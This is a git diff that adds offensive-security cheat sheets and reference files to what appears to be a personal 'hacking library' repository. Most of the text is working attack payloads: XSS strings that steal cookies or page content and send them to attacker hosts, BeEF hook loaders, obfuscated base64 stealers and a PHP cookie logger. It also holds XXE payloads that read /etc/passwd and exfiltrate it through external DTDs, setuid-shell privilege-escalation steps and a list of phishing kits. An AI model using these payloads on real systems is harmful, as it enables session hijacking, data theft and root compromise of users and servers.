+<div id="mycode" expr="alert('hah!')" style="background:url('/service/javascript:eval(document.all.mycode.expr)')"> // IE, some versions of Safari and others) allow JavaScript in CSS, use the moz-binding CSS property for Gecko-based browsers
+alert(eval('document.body.inne' + 'rHTML'));
+java%0ascript
+prompt(1), confirm(...)
+oninput= onplay= // html5
+<form, oninput=prompt(1)> works too
+charset http://ha.ckers.org/charsets.html
+
+<script src="https://../export.jsp;.html?name=%0D%0AContent-Type:%20text/html%0d%0aLast-Modified:%20Tue,%2015%20Nov%201994%2012:45:26%20GMT%0d%0aExpires:%20Tue,%2015%20Nov%202015%2012:45:26%20GMT%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E" ></script>
+<iframe src="https://../export.jsp;.html?name=%0D%0AContent-Type:%20text/html%0d%0aLast-Modified:%20Tue,%2015%20Nov%201994%2012:45:26%20GMT%0d%0aExpires:%20Tue,%2015%20Nov%202015%2012:45:26%20GMT%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E" ></iframe>
+
+exec js in ff when Content-Type: xml
+<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/>
+
+html-encode : -> &#58; url-encode-> %26%2358%3B
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">alert(1);</script>
+</svg>
+or
+<svg><use xlink:href="http://github.com/data&#58;image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB3aWR0aD0iMTAwIiBoZWl0aHQ9IjEwMCI+CiAgPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4KICA8Zm9yZWlnbk9iamVjdCB3aWR0aD0iMTAwIiBoZWlnaHQ9IjUwIiByZXF1aXJlZEV4dGVuc2lvbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPgogIDxlbWJlZCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCIgc3JjPSJqYXZhc2NyaXB0OmFsZXJ0KCd4c3MnKSIgLz4KICA8L2ZvcmVpZ25PYmplY3Q+Cjwvc3ZnPg==#rectangle"></svg>
+or
+<svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="/service/javascript:alert(1)"><rect width="1000" height="1000" /></a></svg>
+
+<LINK REL="stylesheet" HREF="https://192.168.122.1:8443/xss.css"> # ie6 OK
+xss.css:
+body {
+  background-image: url('/service/javascript:alert("XSS");')
+}
+
+<audio src=x onerror=prompt(1)>
+
+var a="alert(doc"+"ument..."; eval(a)
+eval(location.hash.substr(1))
+
+* http://www.slideshare.net/codeblue_jp/cb14-masato-kinugawaen
+if you can set encoding in URL (see http://l0.cm/encodings/table/)
+location.href => http://evil%2f@www.youtube.com/
+feed://evil.cm%2f/x.rss%3f@vulnsite.com/
+
+# IE
+* michele orru
+font-family:a/**/ression(alert(1))('\')exp\')
+Works on IE <= 9: <html> <head> </head> <body> <div style="font-family:a/**/ression(alert(666))('\')exp\')">pwn</div> </body> </html>
+Nice for attribute injection, split the first three chars of expression for filter evasion too (there is still the JS function but you can put obfuscated code instead :-)
+Thanks to chinese friends: http://wooyun.org/bugs/wooyun-2014-068564
+By @gainover1
+
+* carlos
+<%foo onmouseover=alert(1)>blah (IE9 allows to define custom tags)
+
+# httponly bypass
+asp.net: the csrf protection is to actually include the session ID is in the ViewState (owasp)
+
+# attack payloads
+<script>document.location="http://x/?c="+document.cookie</script>
+<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="http://x/?c="+document.cookie)></iframe>
+<script src=//evil/a.js></script>
+<script>window.location='http://evil/'+document.documentElement.innerHTML</script>
+<iframe onload='var sc=document.createElement("scr"%2b"ipt");sc.type="text/javascr"%2b"ipt";sc.src="http://6.6.6.6:3000/hook.js";document.body.appendChild(sc);'/>
+<iframe src=//evil /> and index.html: <script src="http://x.x.x.x:3000/hook.js" type="text/javascript"></script>
+<a href="/service/javascript:location='http://x/'%2bdocument.cookie" onclick="">x</a> # google-ctf-2016 geokitties trick where waf triggered when there was any non-empty event handler
+\x3cimg src=a onerror=\u0022eval(String.fromCharCode(..))\u0022\x3e # 0ctf-2016 guestbook
+<img src=%23 onerror="document.location='http://evil/?c='%2bdocument.cookie">
+<img src=/ onerror=location='http://evil/?c='%2bdocument.cookie>
+new Image().src="http://evil/xss/?"+escape(document.cookie);
+
+?q=%3Clink%0Crel%3Dimport%0Chref%3D%2F%2F1.2.3.4%3E # google-ctf-2016 final destination
+
+<input type="text" onfocus="write(atob('PHNjcmlwdD4KZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwOi8vcmVxdWVzdGIuaW4vMW1sdjYxajE/Y29va2llPSIgKyBkb2N1bWVudC5jb29raWUgKyAiJyAvPiIpOwo8L3NjcmlwdD4='));" autofocus />
+<iframe srcdoc="%26lt%3Bimg%20src%26equals%3Bx%3Ax%20onerror%26equals%3Beval%26lpar%3Batob%26lpar%3B%27ZG9jdW1lbnQubG9jYXRpb249Imh0dHBzOi8vd3d3LnBvdGF0b3BsYS5uZXQveHNzP2Nvb2tpZT0iK2VuY29kZVVSSShkb2N1bWVudC5jb29raWUpOw%3D%3D%27%26rpar%3B%26rpar%3B%26gt%3B (iframe with no closing >)
+
+<script>x=new XMLHttpRequest();x.open("GET","http://github.com/admin/",false);x.send();r=x.responseText;x.open("POST","http://evil/",true);x.setRequestHeader("Content-type","application/x-www-form-urlencoded");x.send(r);</script>
+<img src=x style=display:none onerror=eval(unescape(/xmlhttp%3Dnew%20XMLHttpRequest%28%29%3Bxmlhttp.open%28%22GET%22%2C%22%2fadmin%2fshow.php%22%2Cfalse%29%3Bxmlhttp.send%28%29%3Br%3Dxmlhttp.responseText%3Bxmlhttp.open%28%22POST%22%2C%22http%3A%2f%2frequestb.in%2f17b3o8z1%22%2Ctrue%29%3Bxmlhttp.setRequestHeader%28%22Content-type%22%2C%22application%2fx-www-form-urlencoded%22%29%3Bxmlhttp.send%28r%29%3B/.source));//
+
+<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.js'></script>
+<script>
+  var x = $('body').html().toString();
+  $.post('http://evil/analytics', x);
+</script>
+
+document.body.appendChild(document.createElement("script")).src="http://6.6.6.6:3000/hook.js"
+
+<script>setTimeout(x,3000);function/**/x(){parent.document.getElementsByTagName{"frame")[4].setAttribute("src","//localhost/index.html");}</script> (injecting in the context of a child frame, so we go back to parent to modify an existing frame)
+
+<script>var c=new XMLHttpRequest();c.open('GET','http://github.com/');c.setRequestHeader('Range','bytes=18-18446744073709551615');c.send();</script>
+
+# bypass Content-Disposition: attachment
+see "Unusual Web Bugs"
+* works on my w2k3 IE8
+http://www.awgh.org/archives/57 (CVE-2009-1140 / MS09-019)
+upload: <html><head><title>XSS Test Page</title><script>alert(document.cookie);</script></head><body><code>alert(document.cookie);</code></body></html>
+
+* unclear how it works:
+http://sirdarckcat.blogspot.com.au/2007/12/bypassing-content-disposition.html
+
+# IE content sniffing / MIME-type confusion
+http://blog.detectify.com/post/53925159976/how-to-avoid-ie-content-sniffing-xss-attacks 
+upload test.qwefhj: <html><body><script>alert(document.cookie)</script></body></html>
+fix: "X-Content-Type-Options: nosniff" header (http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx) only supported since IE9
+http://msdn.microsoft.com/en-us/library/ms775147.aspx
+
+works in old IE or if compatibility view is turned on
+
+# cookie logger
+<?php
+$data = "=== REQUEST FROM [".$_SERVER['REMOTE_ADDR']."] ";
+$data .= "-> ".date("Y-m-d : H:i:s")."\n";
+$data .= "GET:\n".var_export($_GET, true)."\n";
+$data .= "POST:\n".var_export($_POST, true)."\n";
+$data .= "COOKIE:\n".var_export($_COOKIE, true)."\n";
+$data .= "SERVER:\n".var_export($_SERVER, true)."\n\n";
+
+file_put_contents("log.txt", $data, FILE_APPEND);
+?>
+
+# IIS filter bypass
+https://blog.whitehatsec.com/internet-explorer-xss-filter/
+http://www.quotium.com/research/advisories/XSS-NetRequestValidation.php
+http://www.jardinesoftware.net/2012/08/29/another-request-validation-bypass/ (same post?)
+
+# XSS Auditor bypass
+http://www.thespanner.co.uk/2015/02/19/another-xss-auditor-bypass/
+
+# CSP tricks
+https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it%27s-CSP!%22
+http://blog.portswigger.net/2016/12/bypassing-csp-using-polyglot-jpegs.html
+https://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf
+
+# length restriction bypasses
+convert to domxss: <script>eval(location.hash.substr(1))</script>
+span an attack payload across multiple fields (twahh p.412)
+
diff --git a/Cheat Sheet/xxe b/Cheat Sheet/xxe
new file mode 100644
index 0000000..6e42b38
--- /dev/null
+++ b/Cheat Sheet/xxe	
@@ -0,0 +1,192 @@
+# XML External Entity attacks
+
+# tools
+https://github.com/ssexxe/XXEBugFind # works on compilded java code
+https://github.com/BuffaloWill/oxml_xxe #docs, xlsx, pptx, odt, svg ...
+otori
+
+# links
+http://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf (Must Read)
+https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf
+https://www.youtube.com/watch?v=eBm0YhBrT_c
+http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
+http://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf
+http://www.nosuchcon.org/talks/2013/D3_03_Alex&Timur_XML_Out_Of_Band.pdf
+http://christian-schneider.net/GenericXxeDetection.html#main
+http://blog.gdssecurity.com/labs/2015/4/29/automated-data-exfiltration-with-xxe.html
+https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing
+http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html#xml-injection
+
+- directories can be listed using "file://MY_DIR/"
+- valid XML files in ASCII or UTF-8 format can be read using "file://MY_DIR/MY_FILE"
+- plain text files (no markup, no entities) in ASCII or UTF-8 can also be read using "file://MY_DIR/MY_FILE"
+- gopher: (disabled since Java 7)
+- jar:{url}!{path}
+- php: ...
+- internal port scan
+- relay attacks to other hosts
+
+# cheat sheet
+http://web-in-security.blogspot.com.au/2016/03/xxe-cheat-sheet.html
+
+# validate xml
+http://www.xmlvalidation.com/index.php
+
+# test (xmlrpc)
+<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT methodName ANY ><!ENTITY xxe "system.listMethods" >]><methodCall><methodName>&xxe;</methodName></methodCall>
+
+# test
+<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe "blah" > ]><tag>&xxe;</tag>
+<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><tag>&xxe;</tag>
+<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/blah" > ]><tag>&xxe;</tag>
+<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://../"> %xxe;]>
+
+# XXE inside a SOAP node (https://twitter.com/Agarri_FR/status/656440244116574208)
+<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://0.0.0.0:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
+
+# Zend Framework (patched in versions 1.11.12 and 1.12.0 of Zend Framework)
+https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120626-0_zend_framework_xxe_injection.txt
+http://framework.zend.com/security/advisory/ZF2012-01
+
+<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><methodCall><methodName>&xxe;</methodName></methodCall>
+
+# upload
+* gopher
+useful because java doesn't support http://login:pass@host but ok for ftp://
+
+* jar
+jar:http://x.x.x.x/blah.jar!/mypkg/lol.class
+jar:file:///etc/hosts!/ # can enum files but i havent found how to yield file content with this
+point to remote URL will temporarily save the file (need dir listing to know name of temp file tho)
+can upload any format not just zip
+
+# can RCE if expect module is installed and loaded (not by default)
+<!ENTITY a SYSTEM 'expect://id'>
+
+# exfil
+payload:
+<!DOCTYPE meh [<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=index.php"><!ENTITY % dtd SYSTEM "http://evil/send.dtd">%dtd;%send;]]>
+send.dtd:
+<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://evil/?%file;'>">%all;
+
+# synacktiv drupal services
+<!DOCTYPE doc [
+ <!ENTITY % remote SYSTEM "http://../test.xml">
+ %remote;
+ %intern;
+ %trick;
+]>
+
+test.xml:
+<!ENTITY % payload SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
+<!ENTITY % intern "<!ENTITY &#37; trick SYSTEM 'file://WOOT%payload;WOOT'>">
+
+if no outbound:
+<!DOCTYPE doc [
+ <!ENTITY % evil SYSTEM "php://filter/convert.base64-decode/resource=data:,`base64(text.xml)`">
+ %evil;
+ %intern;
+ %trick;
+]>
+
+# http://www.youtube.com/watch?v=eHSNT8vWLfc "What you didn't know about XML External Entities Attacks" by Timothy Morgan
+# paper final: http://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
+# CDATA trick (works on java impl)
+<!DOCTYPE meh [
+  <!ENTITY % file SYSTEM "file:///has/broken/xml">
+  <!ENTITY % start "<![CDATA[">
+  <!ENTITY % end "]]>">
+  <!ENTITY % dtd SYSTEM "http://evil/join.dtd">
+%dtd;
+]]>
+<lastname>&all;</lastname>
+join.dtd contains:
+<!ENTITY all "%start;%file;%end;">
+
+# using file-not-found trick to solve exfiltration restrictions ("one line only" and XML metachars), but need outbound to attacker site (http://www.christian-schneider.net/GenericXxeDetection.html)
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE test [  
+  <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
+  %one;
+  %two;
+  %four;
+]>
+dtd-part:
+<!ENTITY % three SYSTEM "file:///etc/passwd">
+<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///"%three;"'>">
+
+
+# facebook xxe via OpenID
+https://www.sensepost.com/blog/2014/revisting-xxe-and-abusing-protocols/
+http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution (openid bug)
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE xrds:XRDS [
+   <!ELEMENT xrds:XRDS (XRD)>
+   <!ATTLIST xrds:XRDS xmlns:xrds CDATA "xri://$xrds">
+   <!ATTLIST xrds:XRDS xmlns:openid CDATA "http://openid.net/xmlns/1.0">
+   <!ATTLIST xrds:XRDS xmlns CDATA "xri://$xrd*($v*2.0)">
+   <!ELEMENT XRD (Service)*>
+   <!ELEMENT Service (Type,URI,openid:Delegate)>
+   <!ATTLIST Service priority CDATA "0">
+   <!ELEMENT Type (#PCDATA)>
+   <!ELEMENT URI (#PCDATA)>
+   <!ELEMENT openid:Delegate (#PCDATA)>
+   <!ENTITY a SYSTEM 'http://198.x.x.143:7806/success.txt'> ]>
+
+<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="http://openid.net/xmlns/1.0" xmlns="xri://$xrd*($v*2.0)">
+  <XRD>
+    <Service priority="0">
+      <Type>http://openid.net/signon/1.0</Type>
+      <URI>http://198.x.x.143:7806/raw.xml</URI>
+      <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate>
+    </Service>
+    <Service priority="0">
+      <Type>http://openid.net/signon/1.0</Type>
+      <URI>&a;</URI>
+      <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service>
+  </XRD>
+</xrds:XRDS>
+
+# facebook xxe via CV
+http://www.attack-secure.com/blog/hacked-facebook-word-document
+
+# portcullis F5 big-ip
+https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-6032/
+https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-6033/
+action=write&contents=<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE root [
+<!ENTITY % remote SYSTEM "http://x.x.x.x/xml?f=/etc/passwd"> %remote;
+%int;
+%trick;]><viewList>
+  <view id="asd">
+    <window>
+      <setting name="x" value="0"/>
+      <setting name="height" value="256"/>
+      <setting name="y" value="190"/>
+      <setting name="typeId" value="BwControlTemplWindow"/>
+      <setting name="selectedMode" value="Both"/>
+      <setting name="width" value="508"/>
+    </window>
+    <window>
+      <setting name="x" value="515"/>
+      <setting name="height" value="256"/>
+      <setting name="toggleOn" value="true"/>
+      <setting name="y" value="0"/>
+      <setting name="typeId" value="MemWindow"/>
+      <setting name="selectedMode" value="Both"/>
+      <setting name="width" value="508"/>
+      <setting name="viewSwitch" value="false"/>
+    </window>
+  </view>
+</viewList>&name=asdasd
+
+# fuzz
+xmlfuzz
+
+# moar tricks
+http://www.pwntester.com/blog/2013/11/28/abusing-jar-downloads/
+https://blog.netspi.com/forcing-xxe-reflection-server-error-messages/
+https://twitter.com/Agarri_FR/status/595598007996919808 "Use %payload;://xxx as the final URL for inline leak via error messages (Java, at least)" "I used that trick last week: dynamic DTD w/o OOB leak (very uncommon), no data outside of attributes, verbose Java parser"
+https://twitter.com/Agarri_FR/status/659182619796574209 "Under Java, FileInputStream will refuse to open "/" and "file:/" (they are directories). But "netdoc:/" is OK"
+file:///proc/self/cwd/../config/ # Java
diff --git a/Cheat Sheet/yum b/Cheat Sheet/yum
new file mode 100644
index 0000000..32667df
--- /dev/null
+++ b/Cheat Sheet/yum	
@@ -0,0 +1,4 @@
+# yum
+
+# missing a library?
+yum provides /path/to/library will tell you which package to install
diff --git a/Cheat Sheet/zsh b/Cheat Sheet/zsh
new file mode 100644
index 0000000..93cbd7f
--- /dev/null
+++ b/Cheat Sheet/zsh	
@@ -0,0 +1,19 @@
+# zsh
+
+# doesn't drop privs by default (tested with zsh 5.0.2 (x86_64-redhat-linux-gnu) on my fedora 18)
+attacker adds below lines to either ~victim/{.profile,.bashrc,./bin/firefox,...}
+cp /bin/zsh /tmp/.stash/zsh
+chmod +s /tmp/.stash/zsh
+# then attacker runs /tmp/.stash/zsh to get the victim's euid
+
+# zsh drops privs if run
+zsh +p
+
+# bash does not drop privs if run with -p
+* run by victim
+cp /bin/bash /tmp/lol
+chmod +s /tmp/lol
+* as attacker
+/tmp/lol -p
+lol-4.2# id
+uid=1000(seb) gid=1000(seb) euid=0(root) egid=0(root) groups=0(root),7(lp),10(wheel),63(audio),100(users),991(wireshark),995(pulse-access),996(pulse),1000(seb),1002(logmon)
diff --git a/HACKING-17 Most Dangerous Hacking Attacks Volume 4 by ALEX WAGNER.pdf b/HACKING-17 Most Dangerous Hacking Attacks Volume 4 by ALEX WAGNER.pdf
new file mode 100644
index 0000000..a53892d
Binary files /dev/null and b/HACKING-17 Most Dangerous Hacking Attacks Volume 4 by ALEX WAGNER.pdf differ
diff --git a/How did I get into the hacker world.rar b/How did I get into the hacker world.rar
new file mode 100644
index 0000000..0483360
Binary files /dev/null and b/How did I get into the hacker world.rar differ
diff --git a/Introduction to Logical Privilege Escalation on Windows-D2T3 - James Forshaw .pdf b/Introduction to Logical Privilege Escalation on Windows-D2T3 - James Forshaw .pdf
new file mode 100644
index 0000000..7a13b54
Binary files /dev/null and b/Introduction to Logical Privilege Escalation on Windows-D2T3 - James Forshaw .pdf differ
diff --git a/Piano Thieving for Experts - SABSA 2014 - v1.5.ppt b/Piano Thieving for Experts - SABSA 2014 - v1.5.ppt
new file mode 100644
index 0000000..362700c
Binary files /dev/null and b/Piano Thieving for Experts - SABSA 2014 - v1.5.ppt differ
diff --git a/README.md b/README.md
index b11b4e3..a810c0d 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,10 @@
-# hacking Library
-‪APT,‬ ‪Cyber warfare,‬ ‪Penetration testing,‬ ‪Zero-day,Exploiting,‬ ‪Spyware,Malwares evade anti-virus detection,‬ ‪Rookit CYPTER,‬ ‪Antiviruses Bypassing-av,‬ ‪WORMS,Sandbox-Escape,‬ ‪Memory-injection,‬ ‪Ethical,Gray,White,RedTeam‬...
-# 我是如何走进黑客世界的？
-https://github.com/MyselfExplorer/hackingLibrary/blob/master/%E6%88%91%E6%98%AF%E5%A6%82%E4%BD%95%E8%B5%B0%E8%BF%9B%E9%BB%91%E5%AE%A2%E4%B8%96%E7%95%8C%E7%9A%84%EF%BC%9F.pdf
-# How did I get into the hacker world?
-https://link.medium.com/skLJG87xfS
+I shut down the social networking platform (twitter/weibo) because of depression.I didn't pay attention to anybody because information would make me nervous.So sorry to my friends who had interacted,I reopened YouTube and uploaded some old hacker demos.I will finish a big article in the next month or so.I believe it will be useful for many people,maybe I won't use social networking platform until I'm better.If you want to follow me,can be in github,it's quiet.I don't have a blog before or sell loopholes.My hacker life is not profitable.So don't be fooled.My mail is myselfexplorer@protonmail.com,if you contact me and my knowledge can help you,I will reply,that's all.
+
+- myselfexplorer 4:37 AM 3/6/2019
+
+I build a new blog,ummm,a theme that looks very old,
+I uploaded my old article.I hope I won't delete it in the future.
+https://1337explorer.blogspot.com/
+
+- myselfexplorer 6:32 AM 3/6/2019
+
diff --git a/The Art Of Human Hacking.pdf b/The Art Of Human Hacking.pdf
new file mode 100644
index 0000000..b0b9bb6
Binary files /dev/null and b/The Art Of Human Hacking.pdf differ
diff --git a/asia-16-Baloch-Bypassing-Browser-Security-Policies-For-Fun-And-Profit.pdf b/asia-16-Baloch-Bypassing-Browser-Security-Policies-For-Fun-And-Profit.pdf
new file mode 100644
index 0000000..e3897fd
Binary files /dev/null and b/asia-16-Baloch-Bypassing-Browser-Security-Policies-For-Fun-And-Profit.pdf differ
diff --git a/awesome phishing.md b/awesome phishing.md
new file mode 100644
index 0000000..fc2177b
--- /dev/null
+++ b/awesome phishing.md	
@@ -0,0 +1,15 @@
+# apt skill - awesome phishing attack:
+
+>https://github.com/thelinuxchoice/blackeye
+>https://github.com/clr2of8/G-chimp
+>https://github.com/certsocietegenerale/swordphish-awareness
+>https://github.com/sweetsoftware/Artemis
+>https://github.com/omergunal/PoT
+>https://github.com/WeebSec/PhishX
+>https://github.com/jofpin/trape
+>https://github.com/Pure-L0G1C/Spectre
+>https://github.com/gophish/gophish
+>https://github.com/thelinuxchoice/shellphish
+>https://github.com/UndeadSec/SocialFish
+>https://github.com/pentestgeek/phishing-frenzy
+>https://github.com/securestate/king-phisher
\ No newline at end of file
diff --git a/browser-security-whitepaper.pdf b/browser-security-whitepaper.pdf
new file mode 100644
index 0000000..4824fe1
Binary files /dev/null and b/browser-security-whitepaper.pdf differ
diff --git a/how i learned to stop fuzzing and find more bugs.pdf b/how i learned to stop fuzzing and find more bugs.pdf
new file mode 100644
index 0000000..a7382b1
Binary files /dev/null and b/how i learned to stop fuzzing and find more bugs.pdf differ
diff --git a/whoamipriv-show me your privileges and I will lead you to SYSTEM.pdf b/whoamipriv-show me your privileges and I will lead you to SYSTEM.pdf
new file mode 100644
index 0000000..271f62b
Binary files /dev/null and b/whoamipriv-show me your privileges and I will lead you to SYSTEM.pdf differ
diff --git "a/\346\210\221\346\230\257\345\246\202\344\275\225\350\265\260\350\277\233\351\273\221\345\256\242\344\270\226\347\225\214\347\232\204\357\274\237.pdf" "b/\346\210\221\346\230\257\345\246\202\344\275\225\350\265\260\350\277\233\351\273\221\345\256\242\344\270\226\347\225\214\347\232\204\357\274\237.pdf"
deleted file mode 100644
index 5eaf204..0000000
Binary files "a/\346\210\221\346\230\257\345\246\202\344\275\225\350\265\260\350\277\233\351\273\221\345\256\242\344\270\226\347\225\214\347\232\204\357\274\237.pdf" and /dev/null differ